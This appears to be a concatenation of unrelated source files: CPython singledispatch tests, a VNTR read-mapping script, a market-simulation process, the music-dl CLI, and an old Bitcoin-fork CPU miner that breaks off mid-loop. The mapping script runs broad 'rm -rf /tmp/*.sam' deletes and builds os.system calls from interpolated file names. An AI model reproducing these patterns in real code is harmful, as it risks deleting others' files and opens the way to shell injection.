l = [1, 2, 3]
s = {object(), None}
f = frozenset(s)
t = (1, 2, 3)
@functools.singledispatch
def g(obj):
return "base"
self.assertEqual(g(d), "base")
self.assertEqual(g(l), "base")
self.assertEqual(g(s), "base")
self.assertEqual(g(f), "base")
self.assertEqual(g(t), "base")
g.register(c.Sized, lambda obj: "sized")
self.assertEqual(g(d), "sized")
self.assertEqual(g(l), "sized")
self.assertEqual(g(s), "sized")
self.assertEqual(g(f), "sized")
self.assertEqual(g(t), "sized")
g.register(c.MutableMapping, lambda obj: "mutablemapping")
self.assertEqual(g(d), "mutablemapping")
self.assertEqual(g(l), "sized")
self.assertEqual(g(s), "sized")
self.assertEqual(g(f), "sized")
self.assertEqual(g(t), "sized")
g.register(c.ChainMap, lambda obj: "chainmap")
self.assertEqual(g(d), "mutablemapping") # irrelevant ABCs registered
self.assertEqual(g(l), "sized")
self.assertEqual(g(s), "sized")
self.assertEqual(g(f), "sized")
self.assertEqual(g(t), "sized")
g.register(c.MutableSequence, lambda obj: "mutablesequence")
self.assertEqual(g(d), "mutablemapping")
self.assertEqual(g(l), "mutablesequence")
self.assertEqual(g(s), "sized")
self.assertEqual(g(f), "sized")
self.assertEqual(g(t), "sized")
g.register(c.MutableSet, lambda obj: "mutableset")
self.assertEqual(g(d), "mutablemapping")
self.assertEqual(g(l), "mutablesequence")
self.assertEqual(g(s), "mutableset")
self.assertEqual(g(f), "sized")
self.assertEqual(g(t), "sized")
g.register(c.Mapping, lambda obj: "mapping")
self.assertEqual(g(d), "mutablemapping") # not specific enough
self.assertEqual(g(l), "mutablesequence")
self.assertEqual(g(s), "mutableset")
self.assertEqual(g(f), "sized")
self.assertEqual(g(t), "sized")
g.register(c.Sequence, lambda obj: "sequence")
self.assertEqual(g(d), "mutablemapping")
self.assertEqual(g(l), "mutablesequence")
self.assertEqual(g(s), "mutableset")
self.assertEqual(g(f), "sized")
self.assertEqual(g(t), "sequence")
g.register(c.Set, lambda obj: "set")
self.assertEqual(g(d), "mutablemapping")
self.assertEqual(g(l), "mutablesequence")
self.assertEqual(g(s), "mutableset")
self.assertEqual(g(f), "set")
self.assertEqual(g(t), "sequence")
g.register(dict, lambda obj: "dict")
self.assertEqual(g(d), "dict")
self.assertEqual(g(l), "mutablesequence")
self.assertEqual(g(s), "mutableset")
self.assertEqual(g(f), "set")
self.assertEqual(g(t), "sequence")
g.register(list, lambda obj: "list")
self.assertEqual(g(d), "dict")
self.assertEqual(g(l), "list")
self.assertEqual(g(s), "mutableset")
self.assertEqual(g(f), "set")
self.assertEqual(g(t), "sequence")
g.register(set, lambda obj: "concrete-set")
self.assertEqual(g(d), "dict")
self.assertEqual(g(l), "list")
self.assertEqual(g(s), "concrete-set")
self.assertEqual(g(f), "set")
self.assertEqual(g(t), "sequence")
g.register(frozenset, lambda obj: "frozen-set")
self.assertEqual(g(d), "dict")
self.assertEqual(g(l), "list")
self.assertEqual(g(s), "concrete-set")
self.assertEqual(g(f), "frozen-set")
self.assertEqual(g(t), "sequence")
g.register(tuple, lambda obj: "tuple")
self.assertEqual(g(d), "dict")
self.assertEqual(g(l), "list")
self.assertEqual(g(s), "concrete-set")
self.assertEqual(g(f), "frozen-set")
self.assertEqual(g(t), "tuple")
def test_c3_abc(self):
c = collections
mro = functools._c3_mro
class A(object):
pass
class B(A):
def __len__(self):
return 0 # implies Sized
@c.Container.register
class C(object):
pass
class D(object):
pass # unrelated
class X(D, C, B):
def __call__(self):
pass # implies Callable
expected = [X, c.Callable, D, C, c.Container, B, c.Sized, A, object]
for abcs in permutations([c.Sized, c.Callable, c.Container]):
self.assertEqual(mro(X, abcs=abcs), expected)
# unrelated ABCs don't appear in the resulting MRO
many_abcs = [c.Mapping, c.Sized, c.Callable, c.Container, c.Iterable]
self.assertEqual(mro(X, abcs=many_abcs), expected)
def test_false_meta(self):
# see issue23572
class MetaA(type):
def __len__(self):
return 0
class A(metaclass=MetaA):
pass
class AA(A):
pass
@functools.singledispatch
def fun(a):
return 'base A'
@fun.register(A)
def _(a):
return 'fun A'
aa = AA()
self.assertEqual(fun(aa), 'fun A')
def test_mro_conflicts(self):
c = collections
@functools.singledispatch
def g(arg):
return "base"
class O(c.Sized):
def __len__(self):
return 0
o = O()
self.assertEqual(g(o), "base")
g.register(c.Iterable, lambda arg: "iterable")
g.register(c.Container, lambda arg: "container")
g.register(c.Sized, lambda arg: "sized")
g.register(c.Set, lambda arg: "set")
self.assertEqual(g(o), "sized")
c.Iterable.register(O)
self.assertEqual(g(o), "sized") # because it's explicitly in __mro__
c.Container.register(O)
self.assertEqual(g(o), "sized") # see above: Sized is in __mro__
c.Set.register(O)
self.assertEqual(g(o), "set") # because c.Set is a subclass of
# c.Sized and c.Container
class P:
pass
p = P()
self.assertEqual(g(p), "base")
c.Iterable.register(P)
self.assertEqual(g(p), "iterable")
c.Container.register(P)
with self.assertRaises(RuntimeError) as re_one:
g(p)
self.assertIn(
str(re_one.exception),
(("Ambiguous dispatch: <class 'collections.abc.Container'> "
"or <class 'collections.abc.Iterable'>"),
("Ambiguous dispatch: <class 'collections.abc.Iterable'> "
"or <class 'collections.abc.Container'>")),
)
class Q(c.Sized):
def __len__(self):
return 0
q = Q()
self.assertEqual(g(q), "sized")
c.Iterable.register(Q)
self.assertEqual(g(q), "sized") # because it's explicitly in __mro__
c.Set.register(Q)
self.assertEqual(g(q), "set") # because c.Set is a subclass of
# c.Sized and c.Iterable
@functools.singledispatch
def h(arg):
return "base"
@h.register(c.Sized)
def _(arg):
return "sized"
@h.register(c.Container)
def _(arg):
return "container"
# Even though Sized and Container are explicit bases of MutableMapping,
# this ABC is implicitly registered on defaultdict which makes all of
# MutableMapping's bases implicit as well from defaultdict's
# perspective.
with self.assertRaises(RuntimeError) as re_two:
h(c.defaultdict(lambda: 0))
self.assertIn(
str(re_two.exception),
(("Ambiguous dispatch: <class 'collections.abc.Container'> "
"or <class 'collections.abc.Sized'>"),
("Ambiguous dispatch: <class 'collections.abc.Sized'> "
"or <class 'collections.abc.Container'>")),
)
class R(c.defaultdict):
pass
c.MutableSequence.register(R)
@functools.singledispatch
def i(arg):
return "base"
@i.register(c.MutableMapping)
def _(arg):
return "mapping"
@i.register(c.MutableSequence)
def _(arg):
return "sequence"
r = R()
self.assertEqual(i(r), "sequence")
class S:
pass
class T(S, c.Sized):
def __len__(self):
return 0
t = T()
self.assertEqual(h(t), "sized")
c.Container.register(T)
self.assertEqual(h(t), "sized") # because it's explicitly in the MRO
class U:
def __len__(self):
return 0
u = U()
self.assertEqual(h(u), "sized") # implicit Sized subclass inferred
# from the existence of __len__()
c.Container.register(U)
# There is no preference for registered versus inferred ABCs.
with self.assertRaises(RuntimeError) as re_three:
h(u)
self.assertIn(
str(re_three.exception),
(("Ambiguous dispatch: <class 'collections.abc.Container'> "
"or <class 'collections.abc.Sized'>"),
("Ambiguous dispatch: <class 'collections.abc.Sized'> "
"or <class 'collections.abc.Container'>")),
)
class V(c.Sized, S):
def __len__(self):
return 0
@functools.singledispatch
def j(arg):
return "base"
@j.register(S)
def _(arg):
return "s"
@j.register(c.Container)
def _(arg):
return "container"
v = V()
self.assertEqual(j(v), "s")
c.Container.register(V)
self.assertEqual(j(v), "container") # because it ends up right after
# Sized in the MRO
def test_cache_invalidation(self):
from collections import UserDict
class TracingDict(UserDict):
def __init__(self, *args, **kwargs):
super(TracingDict, self).__init__(*args, **kwargs)
self.set_ops = []
self.get_ops = []
def __getitem__(self, key):
result = self.data[key]
self.get_ops.append(key)
return result
def __setitem__(self, key, value):
self.set_ops.append(key)
self.data[key] = value
def clear(self):
self.data.clear()
_orig_wkd = functools.WeakKeyDictionary
td = TracingDict()
functools.WeakKeyDictionary = lambda: td
c = collections
@functools.singledispatch
def g(arg):
return "base"
d = {}
l = []
self.assertEqual(len(td), 0)
self.assertEqual(g(d), "base")
self.assertEqual(len(td), 1)
self.assertEqual(td.get_ops, [])
self.assertEqual(td.set_ops, [dict])
self.assertEqual(td.data[dict], g.registry[object])
self.assertEqual(g(l), "base")
self.assertEqual(len(td), 2)
self.assertEqual(td.get_ops, [])
self.assertEqual(td.set_ops, [dict, list])
self.assertEqual(td.data[dict], g.registry[object])
self.assertEqual(td.data[list], g.registry[object])
self.assertEqual(td.data[dict], td.data[list])
self.assertEqual(g(l), "base")
self.assertEqual(g(d), "base")
self.assertEqual(td.get_ops, [list, dict])
self.assertEqual(td.set_ops, [dict, list])
g.register(list, lambda arg: "list")
self.assertEqual(td.get_ops, [list, dict])
self.assertEqual(len(td), 0)
self.assertEqual(g(d), "base")
self.assertEqual(len(td), 1)
self.assertEqual(td.get_ops, [list, dict])
self.assertEqual(td.set_ops, [dict, list, dict])
self.assertEqual(td.data[dict],
functools._find_impl(dict, g.registry))
self.assertEqual(g(l), "list")
self.assertEqual(len(td), 2)
self.assertEqual(td.get_ops, [list, dict])
self.assertEqual(td.set_ops, [dict, list, dict, list])
self.assertEqual(td.data[list],
functools._find_impl(list, g.registry))
class X:
pass
c.MutableMapping.register(X) # Will not invalidate the cache,
# not using ABCs yet.
self.assertEqual(g(d), "base")
self.assertEqual(g(l), "list")
self.assertEqual(td.get_ops, [list, dict, dict, list])
self.assertEqual(td.set_ops, [dict, list, dict, list])
g.register(c.Sized, lambda arg: "sized")
self.assertEqual(len(td), 0)
self.assertEqual(g(d), "sized")
self.assertEqual(len(td), 1)
self.assertEqual(td.get_ops, [list, dict, dict, list])
self.assertEqual(td.set_ops, [dict, list, dict, list, dict])
self.assertEqual(g(l), "list")
self.assertEqual(len(td), 2)
self.assertEqual(td.get_ops, [list, dict, dict, list])
self.assertEqual(td.set_ops, [dict, list, dict, list, dict, list])
self.assertEqual(g(l), "list")
self.assertEqual(g(d), "sized")
self.assertEqual(td.get_ops, [list, dict, dict, list, list, dict])
self.assertEqual(td.set_ops, [dict, list, dict, list, dict, list])
g.dispatch(list)
g.dispatch(dict)
self.assertEqual(td.get_ops, [list, dict, dict, list, list, dict,
list, dict])
self.assertEqual(td.set_ops, [dict, list, dict, list, dict, list])
c.MutableSet.register(X) # Will invalidate the cache.
self.assertEqual(len(td), 2) # Stale cache.
self.assertEqual(g(l), "list")
self.assertEqual(len(td), 1)
g.register(c.MutableMapping, lambda arg: "mutablemapping")
self.assertEqual(len(td), 0)
self.assertEqual(g(d), "mutablemapping")
self.assertEqual(len(td), 1)
self.assertEqual(g(l), "list")
self.assertEqual(len(td), 2)
g.register(dict, lambda arg: "dict")
self.assertEqual(g(d), "dict")
self.assertEqual(g(l), "list")
g._clear_cache()
self.assertEqual(len(td), 0)
functools.WeakKeyDictionary = _orig_wkd
if __name__ == '__main__':
unittest.main()
|
compare_read_mapping_sensitivity.py
|
import glob
from multiprocessing import Process, Manager, Value, Semaphore
import os
import pysam
from random import random
import sys
from reference_vntr import load_unique_vntrs_data
from sam_utils import get_id_of_reads_mapped_to_vntr_in_samfile
from vntr_finder import VNTRFinder
def clean_up_tmp():
os.system('rm -rf /tmp/*.sam')
os.system('rm -rf /tmp/*.fasta')
def bowtie_alignment(fasta_file, output, param):
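"""Align fasta_file against the hg19 bowtie2 index in end-to-end mode, writing SAM to output; param sets the --score-min coefficient."""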
os.system('bowtie2 -x hg19_chromosomes/hg19_bt2_idx --end-to-end -f %s -S %s --threads 24 --score-min L,-0.6,%s' % (fasta_file, output, param))
def bwa_alignment(fasta_file, output, param):
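"""Align fasta_file with bwa mem against the combined hg19 reference, writing SAM to output; param is the -T minimum score to report."""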
os.system('bwa mem -T %s -t 24 hg19_chromosomes/CombinedHG19_Reference.fa %s > %s' % (param, fasta_file, output))
def save_reads_stat(file_name, reads):
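"""Write one line per read to file_name with the read name and its alignment score (AS tag, or None if absent)."""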
with open(file_name, 'w') as out:
for read in reads:
alignment_score = None
for key, value in read.tags:
if key == 'AS':
alignment_score = value
out.write('%s %s\n' % (read.qname, alignment_score))
def get_positive_and_fn_reads_from_samfile(sam_file, reference_vntr, true_reads, read_length=150):
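"""Return reads mapped within read_length of the VNTR locus (positives) and true reads that were unmapped or mapped elsewhere (false negatives)."""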
alignment_file = pysam.AlignmentFile(sam_file, 'r', ignore_truncation=True)
start = reference_vntr.start_point
end = reference_vntr.start_point + reference_vntr.get_length()
positive_reads = []
false_negative_reads = []
try:
for read in alignment_file.fetch(until_eof=True):
if read.is_unmapped:
if read.qname in true_reads:
false_negative_reads.append(read)
continue
# if read.is_supplementary:
# continue
# if read.is_secondary:
# continue
if reference_vntr.chromosome == read.reference_name:
if start - read_length < read.reference_start < end:
positive_reads.append(read)
continue
if read.qname in true_reads:
false_negative_reads.append(read)
except IOError as err:
print('Caught IOError:', err)
print('positive len:', len(positive_reads))
return positive_reads, false_negative_reads
def write_hmm_scores(simulated_samfile, true_reads_hmm_scores, false_reads_hmm_scores, ref_vntr, true_reads):
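"""Score reads from the simulated SAM file against the VNTR HMM in worker processes and write the true-read and false-read scores to separate files."""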
vntr_finder = VNTRFinder(ref_vntr)
hmm = vntr_finder.get_vntr_matcher_hmm(150)
manager = Manager()
false_scores = manager.list()
true_scores = manager.list()
process_list = []
sema = Semaphore(16)
samfile = pysam.AlignmentFile(simulated_samfile, 'r', ignore_truncation=True)
for read in samfile.fetch(until_eof=True):
if read.seq.count('N') > 0:
continue
if True:
if read.qname in true_reads:
sema.acquire()
p = Process(target=VNTRFinder.add_hmm_score_to_list, args=(sema, hmm, read, true_scores))
else:
if random() > 0.001:
continue
sema.acquire()
p = Process(target=VNTRFinder.add_hmm_score_to_list, args=(sema, hmm, read, false_scores))
process_list.append(p)
p.start()
else:
if vntr_finder.is_true_read(read):
sema.acquire()
p = Process(target=VNTRFinder.add_hmm_score_to_list, args=(sema, hmm, read, true_scores))
else:
if random() > 0.001:
continue
sema.acquire()
p = Process(target=VNTRFinder.add_hmm_score_to_list, args=(sema, hmm, read, false_scores))
process_list.append(p)
p.start()
for p in process_list:
p.join()
with open(true_reads_hmm_scores, 'w') as out:
for score in true_scores:
out.write('%s\n' % score)
with open(false_reads_hmm_scores, 'w') as out:
for score in false_scores:
out.write('%s\n' % score)
def find_info_by_mapping(sim_dir='simulation_data/', dir_index=0):
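"""Process one simulation directory: collect true reads, compute HMM scores, and record BWA/Bowtie2 mapping sensitivity for the simulated VNTR."""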
reference_vntrs = load_unique_vntrs_data()
id_to_gene = {119: 'DRD4', 1220: 'GP1BA', 1221: 'CSTB', 1214: 'MAOA', 1219: 'IL1RN'}
gene_to_length = {'DRD4': 528, 'GP1BA': 39, 'CSTB': 168, 'MAOA': 30}
clean_up_tmp()
dirs = glob.glob(sim_dir+'/*')
simulation_dir = dirs[dir_index]
files = glob.glob(simulation_dir + '/*')
for fasta_file in files:
if fasta_file.endswith('WGS_30x.fasta'):
gene_name = simulation_dir.split('/')[-1].split('_')[0]
vntr_id = None
for vid, gname in id_to_gene.items():
if gname == gene_name:
vntr_id = vid
ref_vntr = reference_vntrs[vntr_id]
true_reads_file = fasta_file[:-6] + '_true_reads.txt'
simulated_sam_file = fasta_file[:-6] + '.sam'
if not os.path.exists(true_reads_file):
region = [ref_vntr.start_point, ref_vntr.start_point + gene_to_length[gene_name]]
true_reads = get_id_of_reads_mapped_to_vntr_in_samfile(simulated_sam_file, ref_vntr, region=region)
with open(true_reads_file, 'w') as out:
for true_read in true_reads:
out.write('%s\n' % true_read)
else:
with open(true_reads_file) as infile:
lines = infile.readlines()
true_reads = [line.strip() for line in lines if line.strip() != '']
true_reads_hmm_scores = fasta_file[:-6] + '_t_reads_hmm_score.txt'
false_reads_hmm_scores = fasta_file[:-6] + '_f_reads_hmm_score.txt'
if not os.path.exists(true_reads_hmm_scores):
write_hmm_scores(simulated_sam_file, true_reads_hmm_scores, false_reads_hmm_scores, ref_vntr, true_reads)
for i, parameter in enumerate([10]):
positive_file = fasta_file[:-6] + '_bwa_%s_positive_supplementary_reads.txt' % abs(parameter)
false_negative_file = fasta_file[:-6] + '_bwa_%s_fn_supplementary_reads.txt' % abs(parameter)
if os.path.exists(positive_file) and os.path.exists(false_negative_file):
continue
bwa_alignment_file = '/tmp/_gene%s_' % dir_index + 'bwa_alignment_%s.sam' % i
bwa_alignment(fasta_file, bwa_alignment_file, parameter)
positive_reads, fn_reads = get_positive_and_fn_reads_from_samfile(bwa_alignment_file, ref_vntr, true_reads)
save_reads_stat(positive_file, positive_reads)
save_reads_stat(false_negative_file, fn_reads)
clean_up_tmp()
for i, parameter in enumerate([-0.6, -2]):
if i == 0:
continue
positive_file = fasta_file[:-6] + '_bowtie_%s_positive_supplementary_reads.txt' % abs(parameter)
false_negative_file = fasta_file[:-6] + '_bowtie_%s_fn_supplementary_reads.txt' % abs(parameter)
if os.path.exists(positive_file) and os.path.exists(false_negative_file):
continue
bowtie_alignment_file = '/tmp/_gene%s_' % dir_index + 'bowtie_alignment_%s.sam' % i
bowtie_alignment(fasta_file, bowtie_alignment_file, parameter)
positive_reads, fn_reads = get_positive_and_fn_reads_from_samfile(bowtie_alignment_file, ref_vntr, true_reads)
save_reads_stat(positive_file, positive_reads)
save_reads_stat(false_negative_file, fn_reads)
if gene_name == 'MAOA':
os.system('cp %s /pedigree2/projects/VeNTeR/bowtie_alignment_%s.sam' % (bowtie_alignment_file, i))
clean_up_tmp()
find_info_by_mapping('simulation_data/', int(sys.argv[1]))
|
market.py
|
import time
# import sys
import random
import signal
import concurrent.futures
import os
from multiprocessing import Process
import sysv_ipc
from .sharedvariables import SharedVariables
import math
class Market(Process):
def __init__(
self,
shared_variables: SharedVariables,
coeffs,
internal_factors,
external_factors,
market_city_ipc_key: str,
city_market_ipc_key: str,
event_probability: int,
):
super().__init__()
self.shared_variables = shared_variables
self.city2market = sysv_ipc.MessageQueue(
city_market_ipc_key, sysv_ipc.IPC_CREAT
)
self.market2city = sysv_ipc.MessageQueue(
market_city_ipc_key, sysv_ipc.IPC_CREAT
)
self.market_price = 1.5
self.day = 0
self.threads = []
self.event_probability = event_probability
self.ENERGY = {
"bought": 0,
"sold": 0,
"bought_total": 0,
"sold_total": 0,
}
""" Modulation coefficients for market price calculation """
self.COEFFS = coeffs
""" Internal factors that influences market price"""
self.INTERNAL_FACTORS = internal_factors
""" External factors that influences market price"""
self.EXTERNAL_FACTORS = external_factors
def variation(self, coeffs: list, factors: dict):
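"""Return the weighted sum of the factor values using the given coefficients."""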
return sum([a * b for a, b in zip(list(factors.values()), coeffs)])
def calc_stock(self, sold, bought):
"""Calculates new energy stock influence"""
stock = self.INTERNAL_FACTORS["energy_stock"] + (sold - bought)
if stock == 0:
self.INTERNAL_FACTORS["energy_stock"] = 0
elif stock < 0:
self.INTERNAL_FACTORS["energy_stock"] = -1 * math.log(abs(stock))
else:
self.INTERNAL_FACTORS["energy_stock"] = math.log(stock)
def update_price(self, oldprice: float):
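"""Compute the new market price from the attenuated old price plus internal and external variations."""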
attenuation_variation = (
self.COEFFS["att"] * oldprice
) # Calculates price attenuation
internal_variation = self.variation(
self.COEFFS["intern"], self.INTERNAL_FACTORS
)
external_variation = self.variation(
self.COEFFS["extern"], self.EXTERNAL_FACTORS
)
price = round(
attenuation_variation + internal_variation + external_variation, 2
)
return price
def send_message(self, mtype, pid, data):
""" Send a message to Home """
response = bytes("%s;%s;%s" % (mtype, pid, data), "utf-8")
return self.market2city.send(response)
def new_day(self):
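"""Advance to a new day: update the stock factor and the price, reset the daily counters, and wait on the synchronisation barrier."""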
self.day += 1
self.calc_stock(self.ENERGY["sold"], self.ENERGY["bought"])
self.market_price = self.update_price(self.market_price)
self.ENERGY["bought"] = 0
self.ENERGY["sold"] = 0
print("Market Price is at : %s$/KWh" % self.market_price)
print(
"Market stock difference : %s" % self.INTERNAL_FACTORS["energy_stock"]
)
self.shared_variables.sync_barrier.wait()
def get_message(self):
message, t = self.city2market.receive()
return self.formatMessage(message.decode("utf-8"))
def formatMessage(self, message: str):
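"""Parse a 'type;pid;value' message into a dict; return False if the format is invalid."""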
if isinstance(message, str):
data = message.split(";")
if len(data) == 3:
if all(
[x.isdigit() for x in data]
): # if every field of the message is numeric
msg = {"type": data[0], "pid": data[1], "value": data[2]}
return msg
print("Incorrect format. Ignored message : %s" % message)
return False
def run(self):
try:
signal.signal(signal.SIGUSR1, self.diplomatic_event)
signal.signal(signal.SIGUSR2, self.natural_event)
self.eventProcess = Process(target=self.events_trigger, args=())
self.eventProcess.start()
with concurrent.futures.ThreadPoolExecutor(max_workers=20) as executor:
self.shared_variables.sync_barrier.wait()
while True:
msg = self.get_message()
if msg:
if msg["type"] == "1":
executor.submit(
self.send_message,
"1",
msg["pid"],
round(self.market_price * int(msg["value"]), 2),
)
self.ENERGY["sold"] += int(msg["value"])
elif msg["type"] == "2":
executor.submit(
self.send_message,
"2",
msg["pid"],
round(self.market_price * int(msg["value"]), 2),
)
self.ENERGY["bought"] += int(msg["value"])
elif msg["type"] == "5":
self.new_day()
except KeyboardInterrupt:
self.market2city.remove()
self.city2market.remove()
def events_trigger(self):
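"""Periodically draw a random number and raise SIGUSR1/SIGUSR2 to trigger rare diplomatic or natural events; the odds shorten on each quiet tick."""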
n = 50
while True:
time.sleep(self.event_probability)
x = random.randint(0, n)
if x == 0:
print("Triggering diplomatic event (SIGUSR1)")
os.kill(os.getpid(), signal.SIGUSR1)
n = 50
elif x == 1:
os.kill(os.getpid(), signal.SIGUSR2)
n = 50
else:
n -= 1
def diplomatic_event(self, sig, _):
self.EXTERNAL_FACTORS['diplomatic'] = 1
print(
"£££££££££££££££££££££££££££££££££\n"
"DIPLOMATIC EVENT TRIGGERED !\n"
"£££££££££££££££££££££££££££££££££\n"
)
def natural_event(self, sig, _):
self.EXTERNAL_FACTORS['natural'] = 1
print(
"£££££££££££££££££££££££££££££££££\n"
"NATURAL EVENT TRIGGERED !\n"
"£££££££££££££££££££££££££££££££££\n"
)
|
__main__.py
|
#!/usr/bin/env python
# -*- coding:utf-8 _*-
"""
@author: HJK
@file: main.py
@time: 2019-01-08
"""
import sys
import re
import threading
import click
import logging
import prettytable as pt
from . import config
from .utils import colorize
from .core import music_search, music_download, music_list_merge, get_sequence
import gettext
gettext.install('music-dl', 'locale')
def run():
logger = logging.getLogger(__name__)
music_list = []
thread_pool = []
errors = []
click.echo(
"\n"
+ _("正在搜索 {searchterm} 来自 ...").format(
searchterm=colorize(config.get("keyword"), "yellow")
),
nl=False,
)
# Search each source in its own thread
for source in config.get("source").split():
t = threading.Thread(target=music_search, args=(source, music_list, errors))
thread_pool.append(t)
t.start()
for t in thread_pool:
t.join()
# Divider
click.echo("\n---------------------------\n")
# Report errors from the searches
for err in errors:
logger.debug(_("音乐列表 {error} 获取失败.").format(error=err[0].upper()))
logger.debug(err[1])
# Sort and deduplicate the search results
if config.get("merge"):
music_list = music_list_merge(music_list)
# Build the results table
tb = pt.PrettyTable()
tb.field_names = ["序号", "歌手", "歌名", "大小", "时长", "专辑", "来源"]
# Print every entry in the search list
for index, music in enumerate(music_list):
music.idx = index
tb.add_row(music.row)
# click.echo(music.info)
tb.align = "l"
click.echo(tb)
# Divider
click.echo("\n---------------------------")
# Let the user pick which indices to download
prompt = (
_("请输入{下载序号},支持形如 {numbers} 的格式,输入 {N} 跳过下载").format(
下载序号=colorize(_("下载序号"), "yellow"),
numbers=colorize("0 3-5 8", "yellow"),
N=colorize("N", "yellow"),
)
+ "\n >>"
)
choices = click.prompt(prompt)
while choices.lower() != "n" and not re.match(
r"^((\d+\-\d+)|(\d+)|\s+)+$", choices
):
choices = click.prompt("%s%s" % (colorize(_("输入有误!"), "red"), prompt))
selected_list = get_sequence(choices)
for idx in selected_list:
music_download(idx, music_list)
# Continue searching after the downloads finish
keyword = click.prompt(_("请输入要搜索的歌曲,或Ctrl+C退出") + "\n >>")
config.set("keyword", keyword)
run()
@click.command()
@click.version_option()
@click.option(
"-k",
"--keyword",
prompt=_("请输入要搜索的歌曲,名称和歌手一起输入可以提高匹配(如 空帆船 朴树)") + "\n >>",
help=_("搜索关键字"),
)
@click.option(
"-s",
"--source",
default="qq netease kugou baidu xiami flac",
help=_("支持的数据源: ") + "qq netease kugou baidu xiami flac",
)
@click.option("-c", "--count", default=5, help=_("搜索数量限制"))
@click.option("-o", "--outdir", default=".", help=_("指定输出目录"))
@click.option("-x", "--proxy", default="", help=_("指定代理(如http://127.0.0.1:1087)"))
@click.option("-m", "--merge", default=True, is_flag=True, help=_("对搜索结果去重和排序(默认去重)"))
@click.option("-v", "--verbose", default=False, is_flag=True, help=_("详细模式"))
def main(keyword, source, count, outdir, proxy, merge, verbose):
"""
Search and download music from netease, qq, kugou, baidu and xiami.
Example: music-dl -k "周杰伦"
"""
# Initialise global configuration
config.init()
config.set("keyword", keyword)
config.set("source", source)
config.set("count", min(count, 50))
config.set("outdir", outdir)
config.set("merge", merge)
config.set("verbose", verbose)
if proxy:
proxies = {"http": proxy, "https": proxy}
config.set("proxies", proxies)
level = logging.INFO if verbose else logging.WARNING
logging.basicConfig(
level=level,
format="[%(asctime)s] %(levelname)-8s | %(name)s: %(msg)s ",
datefmt="%Y-%m-%d %H:%M:%S",
)
try:
run()
except (EOFError, KeyboardInterrupt):
sys.exit(0)
if __name__ == "__main__":
main()
|
pyminer.py
|
#!/usr/bin/python
#
# Copyright (c) 2011 The RonPaulCoin developers
# Distributed under the MIT/X11 software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
#
import time
import json
import pprint
import hashlib
import struct
import re
import base64
import httplib
import sys
from multiprocessing import Process
ERR_SLEEP = 15
MAX_NONCE = 1000000L
settings = {}
pp = pprint.PrettyPrinter(indent=4)
class RonPaulCoinRPC:
OBJID = 1
def __init__(self, host, port, username, password):
authpair = "%s:%s" % (username, password)
self.authhdr = "Basic %s" % (base64.b64encode(authpair))
self.conn = httplib.HTTPConnection(host, port, False, 30)
def rpc(self, method, params=None):
self.OBJID += 1
obj = { 'version' : '1.1',
'method' : method,
'id' : self.OBJID }
if params is None:
obj['params'] = []
else:
obj['params'] = params
self.conn.request('POST', '/', json.dumps(obj),
{ 'Authorization' : self.authhdr,
'Content-type' : 'application/json' })
resp = self.conn.getresponse()
if resp is None:
print "JSON-RPC: no response"
return None
body = resp.read()
resp_obj = json.loads(body)
if resp_obj is None:
print "JSON-RPC: cannot JSON-decode body"
return None
if 'error' in resp_obj and resp_obj['error'] != None:
return resp_obj['error']
if 'result' not in resp_obj:
print "JSON-RPC: no result in object"
return None
return resp_obj['result']
def getblockcount(self):
return self.rpc('getblockcount')
def getwork(self, data=None):
return self.rpc('getwork', data)
def uint32(x):
return x & 0xffffffffL
def bytereverse(x):
return uint32(( ((x) << 24) | (((x) << 8) & 0x00ff0000) |
(((x) >> 8) & 0x0000ff00) | ((x) >> 24) ))
def bufreverse(in_buf):
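# reverse the byte order inside each 32-bit word of the buffer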
out_words = []
for i in range(0, len(in_buf), 4):
word = struct.unpack('@I', in_buf[i:i+4])[0]
out_words.append(struct.pack('@I', bytereverse(word)))
return ''.join(out_words)
def wordreverse(in_buf):
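# reverse the order of the 32-bit words in the buffer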
out_words = []
for i in range(0, len(in_buf), 4):
out_words.append(in_buf[i:i+4])
out_words.reverse()
return ''.join(out_words)
class Miner:
def __init__(self, id):
self.id = id
self.max_nonce = MAX_NONCE
def work(self, datastr, targetstr):
# decode work data hex string to binary
static_data = datastr.decode('hex')
static_data = bufreverse(static_data)
# the first 76b of 80b do not change
blk_hdr = static_data[:76]
# decode 256-bit target value
targetbin = targetstr.decode('hex')
targetbin = targetbin[::-1] # byte-swap and dword-swap
targetbin_str = targetbin.encode('hex')
target = long(targetbin_str, 16)
# pre-hash first 76b of block header
static_hash = hashlib.sha256()
static_hash.update(blk_hdr)
for nonce in xrange(self.max_nonce):
# encode 32-bit nonce value
nonce_bin = struct.pack("<I", nonce)
# hash final 4b, the nonce value
hash1_o = static_hash.copy()
hash1_o.update(nonce_bin)
hash1 = hash1_o.digest()
# sha256 hash of sha256 hash
hash_o = hashlib.sha256()
hash_o.update(hash1)
hash = hash_o.digest()
# quick test for winning solution: high 32 bits zero?
if hash[-4:] != '\0\0\0\0':
continue
# convert binary hash to 256-bit Python long
hash = bufreverse(hash)
hash = wordreverse(hash)
hash_str = hash.encode('hex')
l = long(hash_str, 16)
# proof-of-work test: hash < target
if l < target:
print time.asctime(), "PROOF-OF-WORK found: %064x" % (l,)
return (nonce + 1, nonce_bin)
else:
print time.asctime(), "PROOF-OF-WORK false positive %064x" % (l,)
# return (nonce + 1, nonce_bin)
return (nonce + 1, None)
def submit_work(self, rpc, original_data, nonce_bin):
nonce_bin = bufreverse(nonce_bin)
nonce = nonce_bin.encode('hex')
solution = original_data[:152] + nonce + original_data[160:256]
param_arr = [ solution ]
result = rpc.getwork(param_arr)
print time.asctime(), "--> Upstream RPC result:", result
def iterate(self, rpc):
work = rpc.getwork()
if work is None:
time.sleep(ERR_SLEEP)
return
if 'data' not in work or 'target' not in work:
time.sleep(ERR_SLEEP)
return
time_start = time.time()
(hashes_done, nonce_bin) = self.work(work['data'],
work['target'])
time_end = time.time()
time_diff = time_end - time_start
self.max_nonce = long(
(hashes_done * settings['scantime']) / time_diff)
if self.max_nonce > 0xfffffffaL:
self.max_nonce = 0xfffffffaL
if settings['hashmeter']:
print "HashMeter(%d): %d hashes, %.2f Khash/sec" % (
self.id, hashes_done,
(hashes_done / 1000.0) / time_diff)
if nonce_bin is not None:
self.submit_work(rpc, work['data'], nonce_bin)
def loop(self):
rpc = RonPaulCoinRPC(settings['host'], settings['port'],
settings['rpcuser'], settings['rpcpass'])
if rpc is None:
return
while True:
self.iterate(rpc)
def miner_thread(id):
miner = Miner(id)
miner.loop()
if __name__ == '__main__':
if len(sys.argv) != 2:
print "Usage: pyminer.py CONFIG-FILE"
sys.exit(1)
f = open(sys.argv[1])
for line in f:
# skip comment lines
m = re.search('^\s*#', line)
